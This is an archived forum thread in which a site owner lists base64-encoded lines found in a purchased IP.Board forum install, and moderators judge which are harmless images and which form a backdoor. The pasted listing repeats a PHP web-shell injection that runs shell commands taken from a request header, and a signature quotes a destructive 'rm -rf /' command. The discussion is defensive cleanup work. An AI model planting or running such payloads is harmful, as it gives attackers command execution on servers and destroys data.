Jump to content


Check out our Community Blogs

Register and join over 40,000 other developers!


Recent Status Updates

View All Updates

Photo
- - - - -

Virus on my website?

virus remove infection

This topic has been archived. This means that you cannot reply to this topic.
15 replies to this topic

#13 Poe

Poe

    CC Resident

  • Advanced Member
  • PipPipPipPip
  • 81 posts

Posted 04 November 2014 - 08:43 PM

Do you mind if I ask how you obtained these files?

Did someone put them in there for a purpose or did you download a theme/plugin?

 

I'm just looking to avoid such complications

(on a side note, i've never seen a virus in PHP before)


"Portability is for those who can't write new programs" - Linus Torvalds


#14 Keslaw

Keslaw

    CC Lurker

  • New Member
  • Pip
  • 7 posts

Posted 05 November 2014 - 12:13 AM

I bought this forum. Everything were disactivated till now.

 

Another suspicious files lines:

 

\forum\admin\applications\core\modules_public\task\manualResolver.php (1 hit)
Line 129:  print base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
\forum\admin\applications\forums\modules_admin\statistics\stats.php (1 hit)
Line 359:  $content = base64_decode( "R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" );
\forum\admin\applications\forums\modules_public\extras\stats.php (4 hits)
Line 497:  if ( ($this->request['s'] == trim( $this->_myRot13( base64_decode("aHR5bF9ieXFfem5nZw==") ) ) ) and ( $this->request['t'] == "" ) )
Line 509:  @header( $this->_myRot13( base64_decode("UGJhZ3JhZy1nbGNyOiB2em50ci90dnM=") ) );
Line 511:  echo base64_decode($string);
Line 1019:  echo base64_decode( "R0lGODlhhgAfAMQAAAAAAP///+/v79/f38/Pz7+/v6+vr5+fn4+Pj4CAgHBwcGBgYFBQUEBAQDAwMCAgIBAQE" .
\forum\admin\setup\sources\classes\output\publicOutput.php (3 hits)
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
\forum\admin\sources\classes\output\publicOutput.php (3 hits)
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
Line 2876:         if( isset( $this->request[ base64_decode('eWVhcg==') ] ) AND $this->request[ base64_decode('eWVhcg==') ] == base64_decode('aSZsdDszMTk5OQ==') )
\forum\admin\sources\loginauth\openid\Auth\OpenID\Association.php (1 hit)
Line 495:         $secret = base64_decode($secret);
\forum\admin\sources\loginauth\openid\Auth\OpenID\BigMath.php (1 hit)
Line 227:         $b64 = base64_decode($str);
\forum\cache\hdinstall.php (10 hits)
Line 4: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 12: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 16: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 24: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 28: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 36: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 40: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 48: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 52: ========================= /index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
Line 60: ========================= /forum/index.php?<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> ===================================
 
\forum\ips_kernel\classCaptchaPlugin\default.php (1 hit)
Line 227:  print base64_decode( "R0lGODlhyAA8AJEAAN/f3z8/P8zMzP///yH5BAAAAAAALAAAAADIADwAAAL/nI+py+0Po5y02ouz3rz7D4biSJbmiabqyrbuC8fyTNf2jef6zvf+DwwKh8Si8YhMlgACwEHQXESfzgOzykQAqgMmFMr9Rq+GbHlqAFsFWnFVrfwIAvQAu15P0A14Nn8/ADhXd4dnl2YYCAioGHBgyDbnNzBIV0gYxzEYWdg1iLAnScmFuQdAt2UKZTcl+mip+HoYG+tKOfv3N5l5garnmPt6CwyaFzrranu7i0crObvoaKvMyMhrIQhFuyzcyGwXcOpoLYg7DGsZXk5r6DSN51RNfF0RPU5sy7gpnH5bjLhrk7Y9/RQNisfq2CRJauTR6xUuFyBx/yrWypMMmTlq/9IwQnKWcKG5cvMeShBIMOFIaV9w2eti6SBABAyjvBRFMaZCMaxsqtxl8iShjpj+VfqGCJg4XzOfJCK5DVWliFNXlSIENKjWrVy7ev0KNqzYsWTFwhlFU8waLk+efGF7hi0aSgu3iGmV1cxdoGTinimbiGOeP8SWhps6z3AkeMMWW20mMykqQyuJDbYWdufKBJWc2uWmAJZdO0yOKfTCCqHGiO4E/oKGriTYaBw5g/MDqynNlW9Uhmx66tM2i05dNcM8O6Rg2MHLYKraLTpDcLebTke4APkcduAoku0DWpe24MI96ewZPdiy6Rlx/0Y+XJevlNu/z6vtlHFxZbpv9f9edYkfxgVmjnqSxXYOYPfFVMgXIHGC0ltWDNXYJ6Lsw82AFVpWEk4pEabgbsfBM5FphyDWRh1OLCUgbC06NtNU6UV1T1Jl3YhjjjruyGOPPv4IZJBC6tDXGUDB4UUaK06RhRl/0aWWF3CR4YWESraR1ZCh6dMOiMNIFE2GI/bRJYiIEeULiloyUNSFLzWC3VXcqEJXTBe1qApDpbXUEYxr2tYeQCyyGMuIcxbokHfPvPjHf2...
\forum\ips_kernel\classGraph.php (1 hit)
Line 6015:  $errorIconData = base64_decode( 'R0lGODlhKQAlAPf/AP34o/75s6qGFOTi2/32jbKSIvXfTPHqy/Hx8fz3mfz2kvTcQfLx6dTDdf78ybaZNcStXPfjWqF8Df35uv'.


#15 dargueta

dargueta

    I chown trolls.

  • Moderator
  • 4854 posts

Posted 05 November 2014 - 10:58 AM

None of these look particularly suspicious on their own. Can you please post the full files? Just put them in a .zip file and attach that to your post.


Edited by dargueta, 05 November 2014 - 10:58 AM.

sudo rm -rf / && echo $'Sanitize your inputs!'


#16 Alexander

Alexander

    YOL9

  • Moderator
  • 3963 posts

Posted 05 November 2014 - 04:29 PM

In the captcha plugin, you will notice upon decoding that the first three characters are GIF - signifying it is simply encoded binary data that the author chose to pack in to a string rather than supply as an image separately, while the 'stats' binary appears to be a very small GIF, probably a tracking pixel for legitimate purposes (one of the ROT13 encoded strings is "ugly_old_matt", curiously.) Their objective was to blend in with the valid files, making removal difficult as you may take out of course real files.

 

In these situations unless there exists a script someone wrote to remove such a backdoor from your IPB installation, the best option will be to write down which plugins it uses, back up the database after checking its contents are what you expect, and installing a new and possibly less vulnerable version of IPB.

 

Alexander.


All new problems require investigation, and so if errors are problems, try to learn as much as you can and report back.





Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download